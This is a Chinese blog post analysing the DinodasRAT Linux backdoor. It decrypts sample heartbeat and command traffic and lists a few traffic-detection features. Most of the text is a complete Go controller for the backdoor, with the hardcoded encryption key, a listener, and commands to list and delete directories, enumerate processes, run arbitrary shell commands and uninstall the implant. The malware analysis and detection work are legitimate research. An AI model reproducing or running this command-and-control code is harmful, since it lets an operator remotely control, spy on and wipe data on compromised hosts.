后门通信模型剖析

最新推荐文章于 2024-08-23 15:54:50 发布
最新推荐文章于 2024-08-23 15:54:50 发布
阅读量778 收藏 13
点赞数 14
文章标签: java 前端 服务器 python 数据库 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A345545108/article/details/138584088
版权

通信模型剖析

梳理DinodasRAT Linux后门通信模型如下:

  • 发送数据-通信数据结构
#原始数据
20000000e703881435b674f7de23a2f80fe35ac0ba1a46c7d96e08a8747889eacf6b1950

#载荷数据
e703881435b674f7de23a2f80fe35ac0ba1a46c7d96e08a8747889eacf6b1950

#数据解密
1800000000080000006966636f6e666967

#数据解析
1800000000          #DealExShell功能对应的远控指令
08000000            #载荷长度
6966636f6e666967    #字符串:ifconfig

  • 接收数据-通信数据结构
#原始数据
30d00300009fd628ad6b4807862e7a90d3e8b0a5d2acfe380effd0635de272ba038f1d564aa5967dbba8bb47ee236c5c6aaeb9f4efa90b3f6b9d117e85836451aac71fa557026eb1c35802aa5c0e2e4c7eb910978662bee1fdd45fc10451b9c37d44850224eb7c23e7b8ada1594503440f39f691bb475ffd8dfa3c3d8ca08ef81fdb7ee6b083e5c86302d531b857e4c3500a2273cb6559773ee8642b7162d2ded5f785a0bc3c0f5a0f9ce39d6e09cf0d4211d9fe2011e6471c38baf2ce60a9869a07cc9154bf71f71bdd1d33385d8d67f8dffcfe079f161e869bacc1fc2d861be882d2fbca24ac8426bfb8a86f1909a726c9c4b8950ebfe25c17be402b2a8662e651ffa3b05d5d697de194f0f7611c7ad19a6e809a87218929f912dcf3c9b9c751d8120bdc50fe0a1694aba0e67a4d4842df2a0c7d6ff3c584358804e1a9db3485ed2ca8e96eb00117a25e12a3061a0b8d235f6010119a004c0d1c037ac7a4eb432410c3e061698f4542184b224fb6cd4efd0ffd006d54eeb23e99d12e55fa0537e664283c8a7a0bd5493ba509c7ecd63cf23aaa68499eddacb1fd1fe01ef7ab06a54940b1f31c57b0b982ed491835a06bf0accb8b1ff07e348af1a9de0d3b2ac1ffd835b7edf9b071a0a4e0bbdad7ee7469863ec1c4cee0c3ae50e6d53a1704a2f642251d29eb60c4d5b488803eb63ac6b6c14da408be9e6eb84f0648049a51906103e232e307fd7b25e121e3d5bfb3c68cc5a40b9fae85058aedf3e00f37bfc1ed10034dc84cd196ed09386aa7cb68babcaf3b1916501d5bbc6c1e6922971f4a29afb6c8aa45c3a1361ca7e4b8e396bb373b4f9868f893bd01106492c25d0e1655dc57819d071670a4ee9cec179c97b516f3ec412fa1bc98d3093cdf1cb966be07b76d4dd55f351ee88f8d7e0f9b4be11180cb8bd4323d4005b86f63658f19266fc43428b52551095815277d136d9bd1a656bf9a10bfd9f934cfe8920223ac0f57e2991ec072ea76b3080dcbaa3f7845617709872c7236668387d500ced91f81d8d3cbc2b20fdc27ea6775021e7382236d7395c687114a093cead0173fcf092cec821bf8b9e7a0caf82a0bc0eb76950fab63c18c9dc2cecb445d57483ecc5e512ed1da6dc0ea540d8ced99ef00bdeb8cdd0be855fda439f90e23f2ab3b0cf06662714f32ed761a50a292a94b45e0f287783f699c88f24584bb0dca3abb7e4f9d9e91e6b22aa652cdccc7a9789f40afafa4bafa44967b06064804add6ab7652434d9b1c7549063bd09cf48c18061ef3e6b3d3c05b4bc5ca4da74bfadae78e4efd837b82556e792af3e9d7183525326c349953ab95585c66bf1e1074559f9c939ff33217dd350069bdf87606a10fb4046d6d95db34

#载荷数据
9fd628ad6b4807862e7a90d3e8b0a5d2acfe380effd0635de272ba038f1d564aa5967dbba8bb47ee236c5c6aaeb9f4efa90b3f6b9d117e85836451aac71fa557026eb1c35802aa5c0e2e4c7eb910978662bee1fdd45fc10451b9c37d44850224eb7c23e7b8ada1594503440f39f691bb475ffd8dfa3c3d8ca08ef81fdb7ee6b083e5c86302d531b857e4c3500a2273cb6559773ee8642b7162d2ded5f785a0bc3c0f5a0f9ce39d6e09cf0d4211d9fe2011e6471c38baf2ce60a9869a07cc9154bf71f71bdd1d33385d8d67f8dffcfe079f161e869bacc1fc2d861be882d2fbca24ac8426bfb8a86f1909a726c9c4b8950ebfe25c17be402b2a8662e651ffa3b05d5d697de194f0f7611c7ad19a6e809a87218929f912dcf3c9b9c751d8120bdc50fe0a1694aba0e67a4d4842df2a0c7d6ff3c584358804e1a9db3485ed2ca8e96eb00117a25e12a3061a0b8d235f6010119a004c0d1c037ac7a4eb432410c3e061698f4542184b224fb6cd4efd0ffd006d54eeb23e99d12e55fa0537e664283c8a7a0bd5493ba509c7ecd63cf23aaa68499eddacb1fd1fe01ef7ab06a54940b1f31c57b0b982ed491835a06bf0accb8b1ff07e348af1a9de0d3b2ac1ffd835b7edf9b071a0a4e0bbdad7ee7469863ec1c4cee0c3ae50e6d53a1704a2f642251d29eb60c4d5b488803eb63ac6b6c14da408be9e6eb84f0648049a51906103e232e307fd7b25e121e3d5bfb3c68cc5a40b9fae85058aedf3e00f37bfc1ed10034dc84cd196ed09386aa7cb68babcaf3b1916501d5bbc6c1e6922971f4a29afb6c8aa45c3a1361ca7e4b8e396bb373b4f9868f893bd01106492c25d0e1655dc57819d071670a4ee9cec179c97b516f3ec412fa1bc98d3093cdf1cb966be07b76d4dd55f351ee88f8d7e0f9b4be11180cb8bd4323d4005b86f63658f19266fc43428b52551095815277d136d9bd1a656bf9a10bfd9f934cfe8920223ac0f57e2991ec072ea76b3080dcbaa3f7845617709872c7236668387d500ced91f81d8d3cbc2b20fdc27ea6775021e7382236d7395c687114a093cead0173fcf092cec821bf8b9e7a0caf82a0bc0eb76950fab63c18c9dc2cecb445d57483ecc5e512ed1da6dc0ea540d8ced99ef00bdeb8cdd0be855fda439f90e23f2ab3b0cf06662714f32ed761a50a292a94b45e0f287783f699c88f24584bb0dca3abb7e4f9d9e91e6b22aa652cdccc7a9789f40afafa4bafa44967b06064804add6ab7652434d9b1c7549063bd09cf48c18061ef3e6b3d3c05b4bc5ca4da74bfadae78e4efd837b82556e792af3e9d7183525326c349953ab95585c66bf1e1074559f9c939ff33217dd350069bdf87606a10fb4046d6d95db34

#数据解密
57ffffffffffffff4aec1800000000370000007b0300004c696e75785f32303234303530355f30346662373038313830326634326638336134323434383732343063623237375f343533325f5637657468303a20666c6167733d343136333c55502c42524f4144434153542c52554e4e494e472c4d554c5449434153543e20206d747520313530300a2020202020202020696e6574203139322e3136382e3135332e31333320206e65746d61736b203235352e3235352e3235352e30202062726f616463617374203139322e3136382e3135332e3235350a2020202020202020696e65743620666538303a3a353164393a623962663a343830303a3135623120207072656669786c656e203634202073636f7065696420307832303c6c696e6b3e0a202020202020202065746865722030303a30633a32393a37613a36333a62362020747871756575656c656e203130303020202845746865726e6574290a20202020202020205258207061636b6574732031313732333320206279746573203130373531353733202831302e32204d6942290a20202020202020205258206572726f72732030202064726f70706564203020206f76657272756e73203020206672616d6520300a20202020202020205458207061636b6574732031323730303120206279746573203536393331343134202835342e32204d6942290a20202020202020205458206572726f72732030202064726f707065642030206f76657272756e73203020206361727269657220302020636f6c6c6973696f6e7320300a0a6c6f3a20666c6167733d37333c55502c4c4f4f504241434b2c52554e4e494e473e20206d74752036353533360a2020202020202020696e6574203132372e302e302e3120206e65746d61736b203235352e302e302e300a2020202020202020696e657436203a3a3120207072656669786c656e20313238202073636f7065696420307831303c686f73743e0a20202020202020206c6f6f702020747871756575656c656e20313030302020284c6f63616c204c6f6f706261636b290a20202020202020205258207061636b6574732034202062797465732032343020283234302e302042290a20202020202020205258206572726f72732030202064726f70706564203020206f76657272756e73203020206672616d6520300a20202020202020205458207061636b6574732034202062797465732032343020283234302e302042290a20202020202020205458206572726f72732030202064726f707065642030206f76657272756e73203020206361727269657220302020636f6c6c6973696f6e7320300a0a00000000000000

#数据解析
57              #用于计算随机字节长度,2 + 0x57&0x7 = 9
ffffffffffffff4aec  #padding,9个随机字节数据
1800000000      #DealExShell功能对应的远控指令
37000000        #第一段载荷数据长度,固定不变,用于填充被控主机的唯一标识码
7b030000        #第二段载荷数据长度,用于填充远控指令返回信息
4c696e75785f32303234303530355f30346662373038313830326634326638336134323434383732343063623237375f343533325f5637
#字符串:Linux_20240505_04fb7081802f42f83a424487240cb277_4532_V7
657468303a20666c6167733d343136333c55502c42524f4144434153542c52554e4e494e472c4d554c5449434153543e20206d747520313530300a2020202020202020696e6574203139322e3136382e3135332e31333320206e65746d61736b203235352e3235352e3235352e30202062726f616463617374203139322e3136382e3135332e3235350a2020202020202020696e65743620666538303a3a353164393a623962663a343830303a3135623120207072656669786c656e203634202073636f7065696420307832303c6c696e6b3e0a202020202020202065746865722030303a30633a32393a37613a36333a62362020747871756575656c656e203130303020202845746865726e6574290a20202020202020205258207061636b6574732031313732333320206279746573203130373531353733202831302e32204d6942290a20202020202020205258206572726f72732030202064726f70706564203020206f76657272756e73203020206672616d6520300a20202020202020205458207061636b6574732031323730303120206279746573203536393331343134202835342e32204d6942290a20202020202020205458206572726f72732030202064726f707065642030206f76657272756e73203020206361727269657220302020636f6c6c6973696f6e7320300a0a6c6f3a20666c6167733d37333c55502c4c4f4f504241434b2c52554e4e494e473e20206d74752036353533360a2020202020202020696e6574203132372e302e302e3120206e65746d61736b203235352e302e302e300a2020202020202020696e657436203a3a3120207072656669786c656e20313238202073636f7065696420307831303c686f73743e0a20202020202020206c6f6f702020747871756575656c656e20313030302020284c6f63616c204c6f6f706261636b290a20202020202020205258207061636b6574732034202062797465732032343020283234302e302042290a20202020202020205258206572726f72732030202064726f70706564203020206f76657272756e73203020206672616d6520300a20202020202020205458207061636b6574732034202062797465732032343020283234302e302042290a20202020202020205458206572726f72732030202064726f707065642030206f76657272756e73203020206361727269657220302020636f6c6c6973696f6e7320300a0a00000000000000
#字符串:
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.153.133  netmask 255.255.255.0  broadcast 192.168.153.255
        inet6 fe80::51d9:b9bf:4800:15b1  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:7a:63:b6  txqueuelen 1000  (Ethernet)
        RX packets 117233  bytes 10751573 (10.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 127001  bytes 56931414 (54.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


 

  • 心跳通信-通信数据结构
#原始数据
3078000000c7c338a7d4639d4beef26f76764f604d2a126b3ae06a8d2da8b0e78a154df6c996f06d0cffbd341be6fa4ce0c72b9c185ea9c2e48ecc4d239c33585a3d598442f069dffa971841eadd5144084626b95de5f3ef937a77bed91e7c6161fb94ea8240ea939d04b0ee32eda9ddd917e9393aaca0c7ecb483d069

#载荷数据
c7c338a7d4639d4beef26f76764f604d2a126b3ae06a8d2da8b0e78a154df6c996f06d0cffbd341be6fa4ce0c72b9c185ea9c2e48ecc4d239c33585a3d598442f069dffa971841eadd5144084626b95de5f3ef937a77bed91e7c6161fb94ea8240ea939d04b0ee32eda9ddd917e9393aaca0c7ecb483d069

#数据解密
e7b3b3b3b3b3b3b34bd4010000000037000000230000004c696e75785f32303234303530355f30346662373038313830326634326638336134323434383732343063623237375f343533325f56374b616c6920474e552f4c696e757820526f6c6c696e672009363409726f6f740932093500000000000000

#数据解析
e7b3b3b3b3b3b3b34bd4    #2 + 0xe7&0x7 = 9个随机字节数据
0100000000  #指令编号
37000000    #第一段载荷数据长度,固定不变,用于填充被控主机的唯一标识码
23000000    #第二段载荷数据长度,用于填充远控指令返回信息
4c696e75785f32303234303530355f30346662373038313830326634326638336134323434383732343063623237375f343533325f5637
#字符串:Linux_20240505_04fb7081802f42f83a424487240cb277_4532_V7
4b616c6920474e552f4c696e757820526f6c6c696e672009363409726f6f7409320935
#字符串:Kali GNU/Linux Rolling     64  root    2   5
00000000000000

通信流量检测方法

结合通信模型提取通信流量检测方法,检测特征如下:

  • 第一段数据包即为心跳通信数据包,且后续发送的心跳通信数据包的长度与其相同
  • 心跳通信数据包的数据结构为:一字节固定数据0x30 + 4字节后续载荷长度(小端序存储) + 载荷数据
  • 远控指令通信数据包的数据结构为:4字节后续载荷长度(小端序存储) + 载荷数据
  • 使用内置密钥即可实现对DinodasRAT Linux后门的通信数据解密

 

模拟构建DinodasRAT Linux后门控制端

在详细梳理了DinodasRAT Linux后门的通信模型后,模拟构建DinodasRAT Linux后门控制端也就相对比较简单,因为其相关远控指令的通信数据模型均相同,因此我们在成功实现一个远控指令功能后,可很快速的对其他远控指令的远控功能进行实现。

备注:当前模拟构建的DinodasRAT Linux后门控制端暂只支持DirClass、DelDir、EnumProcess、DealExShell、UninstallMm远控指令

代码实现

  • main.go
package main

import (
    "awesomeProject5/common"
    "bufio"
    "bytes"
    "encoding/hex"
    "fmt"
    "net"
    "os"
)

func main() {
    client_dinodasrat("0.0.0.0", "80")
}

func client_dinodasrat(address, port string) {
    // 创建监听器
    listener, err := net.Listen("tcp", address+":"+port)
    if err != nil {
        fmt.Println("Error listening:", err.Error())
        return
    }
    defer listener.Close()

    fmt.Println("Server started. Listening on " + address + ":" + port)

    for {
        conn, err := listener.Accept()
        if err != nil {
            fmt.Println("Error accepting connection:", err.Error())
            return
        }
        // 处理服务端连接
        go handle_dinodasrat_Connection(conn)
    }
}

func handle_dinodasrat_Connection(conn net.Conn) {
    defer conn.Close()

    encdata := make(chan []byte)
    go KeepHeart_Recv(conn, encdata)

    for {
        text := ""
        fmt.Print("请选择需执行的功能:help、DirClass、DelDir、EnumProcess、DealExShell、UninstallMm\n>")
        reader := bufio.NewScanner(os.Stdin)
        if reader.Scan() {
            text = reader.Text()
            if text == "DirClass" {
                fmt.Print(text + "指令-请输入需查看的目录路径:\n>")
                reader2 := bufio.NewScanner(os.Stdin)
                if reader2.Scan() {
                    buf_DirClass := reader2.Text()
                    sendbuf := []byte{}
                    sendbuf = append(sendbuf, common.IntToBytes_little(2)...)
                    sendbuf = append(sendbuf, byte(0))
                    sendbuf = append(sendbuf, common.IntToBytes_little(len(buf_DirClass))...)
                    sendbuf = append(sendbuf, []byte(buf_DirClass)...)
                    common.Sendbuf(conn, sendbuf)
                    EncData := <-encdata
                    fmt.Println("*******************DirClass:" + buf_DirClass + "*******************")
                    fmt.Println(string(EncData))
                }
            } else if text == "DelDir" {
                fmt.Print(text + "指令-请输入需删除的目录路径:\n>")
                reader2 := bufio.NewScanner(os.Stdin)
                if reader2.Scan() {
                    buf_DelDir := reader2.Text()
                    sendbuf := []byte{}
                    sendbuf = append(sendbuf, common.IntToBytes_little(3)...)
                    sendbuf = append(sendbuf, byte(0))
                    sendbuf = append(sendbuf, common.IntToBytes_little(len(buf_DelDir))...)
                    sendbuf = append(sendbuf, []byte(buf_DelDir)...)
                    common.Sendbuf(conn, sendbuf)
                    EncData := <-encdata
                    if bytes.Equal(EncData, []byte{0x31}) {
                        fmt.Println("*******************DelDir:" + buf_DelDir + "*******************")
                        fmt.Println("DelDir ok")
                    }
                }
            } else if text == "EnumProcess" {
                buf_EnumProcess := ""
                sendbuf := []byte{}
                sendbuf = append(sendbuf, common.IntToBytes_little(0x11)...)
                sendbuf = append(sendbuf, byte(0))
                sendbuf = append(sendbuf, common.IntToBytes_little(len(buf_EnumProcess))...)
                sendbuf = append(sendbuf, []byte(buf_EnumProcess)...)
                common.Sendbuf(conn, sendbuf)
                EncData := <-encdata
                fmt.Println("*******************EnumProcess:" + buf_EnumProcess + "*******************")
                fmt.Println(string(EncData))
            } else if text == "DealExShell" {
                fmt.Print(text + "指令-请输入需执行的shell命令:\n>")
                reader2 := bufio.NewScanner(os.Stdin)
                if reader2.Scan() {
                    buf_DealExShell := reader2.Text()
                    sendbuf := []byte{}
                    sendbuf = append(sendbuf, common.IntToBytes_little(0x18)...)
                    sendbuf = append(sendbuf, byte(0))
                    sendbuf = append(sendbuf, common.IntToBytes_little(len(buf_DealExShell))...)
                    sendbuf = append(sendbuf, []byte(buf_DealExShell)...)
                    common.Sendbuf(conn, sendbuf)
                    EncData := <-encdata
                    fmt.Println("*******************DealExShell:" + buf_DealExShell + "*******************")
                    fmt.Println(string(EncData))
                }
            } else if text == "UninstallMm" {
                buf_UninstallMm := ""
                sendbuf := []byte{}
                sendbuf = append(sendbuf, common.IntToBytes_little(0x2e)...)
                sendbuf = append(sendbuf, byte(0))
                sendbuf = append(sendbuf, common.IntToBytes_little(len(buf_UninstallMm))...)
                sendbuf = append(sendbuf, []byte(buf_UninstallMm)...)
                common.Sendbuf(conn, sendbuf)
                EncData := <-encdata
                if bytes.Equal(EncData, []byte{0x31}) {
                    fmt.Println("*******************UninstallMm:" + buf_UninstallMm + "*******************")
                    fmt.Println("UninstallMm ok")
                    os.Exit(0)
                }
            } else if text == "help" {
                fmt.Println("********支持功能如下********")
                fmt.Println("DirClass:查看目录")
                fmt.Println("DelDir:删除目录")
                fmt.Println("EnumProcess:查看进程")
                fmt.Println("DealExShell:执行shell命令")
                fmt.Println("UninstallMm:卸载自身")
                fmt.Println("**************************")
            }
        }
    }
}

func KeepHeart_Recv(conn net.Conn, encdata chan []byte) {
    for {
        recvbuf, err := common.RecvBuf(conn)
        if err != nil {
            continue
        }
        //fmt.Println(hex.EncodeToString(recvbuf))
        key, _ := hex.DecodeString("A101A8EAC010FB120671F318ACA061AF") //tcp
        if recvbuf[0] == 0x30 {
            dec_data_len := common.BytesToInt_Little(recvbuf[1:5])
            if dec_data_len == len(recvbuf[5:]) {
                plain_uint32 := common.BytesToUint32Slice(recvbuf[5:])
                key_uint32 := common.BytesToUint32Slice(key)

                //fmt.Println(hex.EncodeToString(recvbuf))
                dec_data := common.Decrypt_out(plain_uint32, len(plain_uint32)*4, key_uint32)
                //fmt.Println(hex.EncodeToString(dec_data))
                padding := int(2 + dec_data[0]&0x7)
                Command := common.BytesToInt_Little(dec_data[1+padding : 5+padding])
                DeviceIDBuf_Len := common.BytesToInt_Little(dec_data[6+padding : 10+padding])
                CommandBuf_Len := common.BytesToInt_Little(dec_data[10+padding : 14+padding])
                //DeviceIDBuf := dec_data[14+padding : 14+padding+DeviceIDBuf_Len]
                CommandBuf := dec_data[14+padding+DeviceIDBuf_Len : 14+padding+DeviceIDBuf_Len+CommandBuf_Len]
                //fmt.Println(string(DeviceIDBuf))
                //fmt.Println(string(CommandBuf))
                switch Command {
                case 0x01:
                    //Heart packet
                    continue
                case 02:
                    //DirClass
                    encdata <- CommandBuf
                case 0x04:
                    //DelDir
                    encdata <- CommandBuf
                case 0x11:
                    //EnumProcess
                    encdata <- CommandBuf
                case 0x18:
                    //DealExShell
                    encdata <- CommandBuf
                case 0x2e:
                    //UninstallMm
                    encdata <- CommandBuf
                default:
                    fmt.Println(string(CommandBuf))
                    fmt.Println(hex.EncodeToString(dec_data))
                    continue
                }
            }
        }
    }
}
  • common.go
package common

import (
    "bytes"
    "encoding/binary"
    "encoding/hex"
    "fmt"
    "net"
)

func Sendbuf(conn net.Conn, buf []byte) {
    sendbuf := []byte{}
    key, _ := hex.DecodeString("A101A8EAC010FB120671F318ACA061AF")
    output := Qq_encrypt(buf, len(buf), key)
    sendbuf = append(sendbuf, IntToBytes_little(len(output))...)
    sendbuf = append(sendbuf, output...)
    conn.Write(sendbuf)
}

func RecvBuf(conn net.Conn) (buf_recv []byte, err error) {
    buffer1 := make([]byte, 5)
    bytesRead, err := conn.Read(buffer1)
    if err != nil {
        return nil, err
    }
    buf_recv = append(buf_recv, buffer1[:bytesRead]...)

    if buf_recv[0] == byte(0x30) {
        buflen := BytesToInt_Little(buf_recv[1:5])
        buffer2 := make([]byte, buflen)
        bytesRead, err = conn.Read(buffer2)
        if err != nil {
            fmt.Println("Error reading:", err.Error())
        }
        buf_recv = append(buf_recv, buffer2[:bytesRead]...)
    }
    return
}

func BytesToInt_Little(bys []byte) int {
    bytebuff := bytes.NewBuffer(bys)
    var data int32
    binary.Read(bytebuff, binary.LittleEndian, &data)
    return int(data)
}

func IntToBytes_little(n int) []byte {
    data := int32(n)
    bytebuf := bytes.NewBuffer([]byte{})
    binary.Write(bytebuf, binary.LittleEndian, data)
    return bytebuf.Bytes()
}
  • dinodasrat_de.go
package common

import (
    "encoding/binary"
    "fmt"
)

func qq_decipher(input []uint32, key []uint32) (result uint32, output []uint32) {
    sum := uint32(0xE3779B90)
    delta := uint32(0x9E3779B9)
    y := input[0]
    z := input[1]

    a := key[0]
    b := key[1]
    c := key[2]
    d := key[3]

    for i := 0; i < 0x10; i++ {
        z -= ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d)
        y -= ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b)
        sum -= delta
    }
    output = append(output, y)
    output = append(output, z)
    return
}

func BytesToUint32Slice(data []byte) []uint32 {
    if len(data)%4 != 0 {
        fmt.Println("error")
    }

    numUint32 := len(data) / 4
    uint32Slice := make([]uint32, numUint32)

    for i := 0; i < numUint32; i++ {
        uint32Value := binary.BigEndian.Uint32(data[i*4 : (i+1)*4])
        uint32Slice[i] = uint32Value
    }

    return uint32Slice
}

func uint32SliceToBytes(data []uint32) []byte {
    totalBytes := len(data) * 4

    byteSlice := make([]byte, totalBytes)

    for i := 0; i < len(data); i++ {
        binary.BigEndian.PutUint32(byteSlice[i*4:(i+1)*4], data[i])
    }

    return byteSlice
}

func Decrypt_out(enc_data []uint32, enc_data_len int, key []uint32) (output []byte) {
    crypted32 := []uint32{0x00, 0x00}
    c32_prev := []uint32{0x00, 0x00}
    plain32 := []uint32{0x00, 0x00}
    p32_prev := []uint32{0x00, 0x00}

    pos := 0
    crypted32[0] = enc_data[pos]
    crypted32[1] = enc_data[pos+1]
    pos += 2

    c32_prev[0] = crypted32[0]
    c32_prev[1] = crypted32[1]

    _, p32_prev = qq_decipher(crypted32, key)
    output = append(output, uint32SliceToBytes(p32_prev)...)

    padding := 2 + output[0]&0x7
    if padding < 2 {
        padding += 8
    }
    plain_len := enc_data_len - 1 - int(padding) - 7
    if plain_len < 0 {
        return
    }
    count64 := enc_data_len / 8
    for {
        count64 = count64 - 1
        if count64 <= 0 {
            break
        }
        c32_prev[0] = crypted32[0]
        c32_prev[1] = crypted32[1]

        crypted32[0] = enc_data[pos]
        crypted32[1] = enc_data[pos+1]
        pos += 2

        p32_prev[0] = p32_prev[0] ^ crypted32[0]
        p32_prev[1] = p32_prev[1] ^ crypted32[1]

        _, p32_prev = qq_decipher(p32_prev, key)

        plain32[0] = p32_prev[0] ^ c32_prev[0]
        plain32[1] = p32_prev[1] ^ c32_prev[1]

        output = append(output, uint32SliceToBytes(plain32)...)
    }
    return
}
  • dinodasrat_en.go
package common

import (
    "crypto/rand"
    "math/big"
)

func qq_encipher(input []uint32, key []uint32) (output []uint32) {
    sum := uint32(0)
    delta := uint32(0x9E3779B9)
    y := input[0]
    z := input[1]

    a := key[0]
    b := key[1]
    c := key[2]
    d := key[3]

    for i := 0; i < 0x10; i++ {
        sum += delta
        y += ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b)
        z += ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d)
    }
    output = append(output, y)
    output = append(output, z)
    return
}

func encrypt_out(dec_data []uint32, dec_data_len int, key []uint32) (output []byte) {
    plain32 := []uint32{0x00, 0x00}
    p32_prev := []uint32{0x00, 0x00}
    crypted32 := []uint32{0x00, 0x00}
    c32_prev := []uint32{0x00, 0x00}

    pos := 0
    crypted32[0] = dec_data[pos]
    crypted32[1] = dec_data[pos+1]
    pos += 2

    c32_prev[0] = crypted32[0]
    c32_prev[1] = crypted32[1]

    plain32[0] = crypted32[0] ^ p32_prev[0]
    plain32[1] = crypted32[1] ^ p32_prev[1]

    count64 := dec_data_len / 8
    for {
        crypted32 = qq_encipher(plain32, key)

        crypted32[0] = crypted32[0] ^ p32_prev[0]
        crypted32[1] = crypted32[1] ^ p32_prev[1]
        output = append(output, uint32SliceToBytes(crypted32)...)

        p32_prev[0] = plain32[0]
        p32_prev[1] = plain32[1]

        c32_prev[0] = crypted32[0]
        c32_prev[1] = crypted32[1]

        if count64 > 1 {
            crypted32[0] = dec_data[pos]
            crypted32[1] = dec_data[pos+1]
            pos += 2
            plain32[0] = crypted32[0] ^ c32_prev[0]
            plain32[1] = crypted32[1] ^ c32_prev[1]
        }
        count64 = count64 - 1
        if count64 <= 0 {
            break
        }
    }
    return
}

func Qq_encrypt(plain []byte, plain_len int, key []byte) (output []byte) {
    crypted := []byte{}
    padding := (plain_len + 10) % 8
    if padding > 0 {
        padding = 8 - padding
    }
    randomBytes := make([]byte, 20)
    rand.Read(randomBytes)
    randombyte := randomBytes[0]
    crypted = append(crypted, ((randombyte & 0xf8) | byte(padding)))
    padding += 2

    for {
        padding -= 1
        if padding < 0 {
            break
        }
        randomnum, _ := rand.Int(rand.Reader, big.NewInt(20))
        crypted = append(crypted, (randomBytes[int(randomnum.Int64())] & 0xff))
    }
    crypted = append(crypted, plain...)
    crypted = append(crypted, []byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}...)

    crypted_uint32 := BytesToUint32Slice(crypted)
    key_uint32 := BytesToUint32Slice(key)
    output = encrypt_out(crypted_uint32, len(crypted_uint32)*4, key_uint32)
    return
}

 

海安P海云
关注
  • 14
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
完整B/S后门开发实战VC源代码
03-15
此外,可能还会涉及加密通信技术,如SSL/TLS,以确保后门通信的安全性,避免被监控和检测。 在文件名称列表中,我们看到的是"完整BS后门开发实战",这可能是一个包含教程、示例代码和练习的综合资源。在学习过程中...
基于网络驱动技术的木马通信检测系统 (2010年)
05-30
为提高木马程序的网络通信检测率,在比较各种包截获技术优缺点的基础上,设计并实现一种基于NDIS Hook驱动的木马通信检测系统,给出主要模块和数据结构,提出基于网络通信行为分析技术的木马通信识别模型。...
TinyShell后门通信模型剖析
A345545108的博客
04-28 918
5890ae86f1b91cf6298395711dde580d #内置的challenge校验数据。#************第一个通信数据包 tsh -> tshd。#************第二个通信数据包 tsh -> tshd。#************第三个通信数据包 tshd -> tsh。#************计算send_aes_key。#************计算recv_aes_key。//前两字节为buffer长度。// 读取文件的所有内容。
CIA组织MikroTik软路由攻击场景复现及后门加解密剖析
A345545108的博客
04-27 2110
写文章还是有一段时间了,发布的文章也是获得了不少小伙伴的关注,同时也和圈子里面的小伙伴慢慢的建立起了联系,平时也会时不时的一起探讨一些技术问题。因此,在最近和小伙伴的交流学习过程中,有一个小伙伴提到了一款远控工具,名字叫tinyshell:刚听到此远控工具的名字,确实感觉没什么映像,不过尝试在网络中搜索了一下此工具,发现此工具是一款轻量级网络设备后门程序,而且其曾被CIA组织所青睐,配合Chimay Red漏洞利用工具对MikroTik路由器发起攻击。
大模型关键技术与应用
xzp740813的博客
07-11 1255
2022年底,OpenAI发布了跨时代的ChatGPT应用。这是第一个具有流畅的多轮对话体验、渊博的通识知识,并能够深刻理解人类意图的生成式人工智能(AI)应用。它的成功使大模型成为AI的主旋律,在极短的时间内改变了AI产业的格局。尽管距离ChatGPT的发布仅过去一年多,但大模型技术已经取得了巨大的进展。随着GPT-4、Gemini、Sora、Claude3、Kimi等一系列大模型的陆续发布,大模型能力已迅速提升,甚至更为强大的通用人工智能(AGI)已初见端倪。
第8章 通信网络安全
Hardworking666的博客
01-18 743
通信网络安全
碎片笔记 | 大模型攻防简报
Meiling_up
09-13 1067
碎片笔记 | 大模型攻防简报
大模型介绍1:理论基础
hzp666的博客
01-23 1443
语言大模型的涌现能力[18]、规模定律[14],多模态大模型的知识表示、逻辑推理能力、泛化能力、情景学习能力[19][37]等方面有待展开深入研究,为大模型的大规模 实际应用提供理论保障。大模型基于数据驱动深度学习方式,依赖训练数据所覆盖的场景,由于复杂场景数据不足,大模型存在特定场景适用性不足的问题,面临鲁棒性和泛化性等挑战。早期的语言大模型表现出一定 的少样本学习能力,但是其学习目标主要通过预测下一个单词实现, 仍不能很好地遵循人类指令,甚至会输出无用的、有害的信息,难以 有效对齐人类的偏好。
Webshell后门分析
Williamanddog的博客
02-06 727
通过文件上传漏洞上传webshell 访问webshell地址: 可以通过post传参来执行命令,a=system("whoami"); 为什么可以通过post传参来执行系统命令呢? 分析一句话webshell的代码: php?>是php语言的格式,eval将括号内的字符串解析为php代码。 $_POST[test]为获取post参数test的值 @是抑制符号,屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息,这样用户就看不到程序的 出错信息。
windows中常见后门持久化方法总结
收集盒 Book box
11-13 1702
前言 当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法 后门持久化 我的操作环境是: 无AV、管理员权限(提权、免杀等是后门持久化的铺垫,当然有的方法也并不是全部需要这些铺垫) 操作系统:win7,windows server 2008R2,xp shift后门...
深度学习大模型学习100tips
热门推荐
xw555666的博客
11-07 1万+
